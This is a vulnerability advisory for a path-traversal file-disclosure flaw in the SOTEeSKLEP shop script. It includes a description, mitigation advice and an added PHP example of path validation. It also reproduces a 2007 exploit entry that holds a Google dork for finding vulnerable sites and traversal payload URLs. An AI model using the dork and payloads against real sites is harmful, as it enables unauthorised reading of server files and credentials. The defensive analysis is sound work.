Vendor: SOTEeSKLEP
By: dun
CVSS: 7.5 (HIGH)
Remote File Disclosure
CWE: 22
Product Name: SOTEeSKLEP
Affected Version From: 3.1RC8
Affected Version To: 3.5RC9
Patch Exists: NO
Related CWE:
CPE: sote:esklep
Metasploit:
Other Scripts:
Platforms Tested:
2007

SOTEeSKLEP Remote File Disclosure Vulnerability

The vulnerability allows a remote attacker to read arbitrary files on the system. The script under '/go/_files/' appends the user-supplied 'file' parameter to a fixed directory path without validation, so a value containing '../' sequences resolves to a file outside the intended directory. This can lead to the disclosure of sensitive information and potentially compromise the system.

Mitigation:

To mitigate this vulnerability, sanitize user input and validate file paths before accessing them. Restricting access to sensitive files and directories also helps prevent unauthorized access.
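One way to apply that validation to the file lookup quoted in the advisory, as an added example (not SOTEeSKLEP's code or a vendor patch). The function name `resolveHtmlFile`, the allow-list pattern and the temporary demo tree are assumptions, and the symlink case assumes a POSIX system.

```php
<?php
// Added example: resolveHtmlFile() and the directory layout are hypothetical,
// not SOTEeSKLEP code or a vendor patch.

/** Return the canonical path of $requested inside $baseDir, or null to refuse. */
function resolveHtmlFile(string $baseDir, string $requested): ?string
{
    // Allow-list: a single plain file name, no separators, no leading dot.
    if (!preg_match('/\A[A-Za-z0-9_-][A-Za-z0-9._-]*\z/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "." and ".." and follows symlinks; false if missing.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Containment check: the resolved path must still sit under the base dir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed demo tree in a temporary directory (assumption, for illustration).
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'sote_demo_' . getmypid();
$base = "$root/themes/_en/_html_files";
mkdir($base, 0700, true);
file_put_contents("$base/terms.html", "<p>terms</p>\n");
file_put_contents("$root/secret.txt", "constructed secret\n");
symlink("$root/secret.txt", "$base/link.html"); // symlink escaping the base

$tests = ['terms.html', './.././.././.././secret.txt', 'link.html', 'missing.html'];
foreach ($tests as $name) {
    $path = resolveHtmlFile($base, $name);
    if ($path === null) {
        echo str_pad($name, 30), "refused (respond 404)\n";
    } else {
        echo str_pad($name, 30), "served: ", file_get_contents($path);
    }
}

// Remove the demo tree.
unlink("$base/link.html"); unlink("$base/terms.html"); unlink("$root/secret.txt");
rmdir($base); rmdir("$root/themes/_en"); rmdir("$root/themes"); rmdir($root);
```

Only `terms.html` is served; the traversal string fails the allow-list, and `link.html` passes the allow-list but is refused by the containment check after `realpath()` resolves the symlink.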

Exploit-DB raw data:

SOTEeSKLEP Remote File Disclosure Vulnerability

Script : SOTEeSKLEP

Versions: 3.1RC8, 3.5RC1, 3.5RC4, 3.5RC9, and I think others.

Site : http://www.sote.pl

Bug:

...
if (! empty($_REQUEST["file"])) { $file=$_REQUEST['file']; }
...
$file_path="$DOCUMENT_ROOT/themes/_$config->lang/_html_files/$file";
if (file_exists($file_path)) { $fd=fopen($file_path,"r");
$data=fread($fd,filesize($file_path));
print $data;
fclose($fd);
}
...

Dork: inurl:"/go/_files/?file="

Examples:
http://???/go/_files/?file=./.././.././.././
http://???/go/_files/?file=./.././.././.././go/_files/index.php

Discovered by dun
2007.08.11

# milw0rm.com [2007-08-13]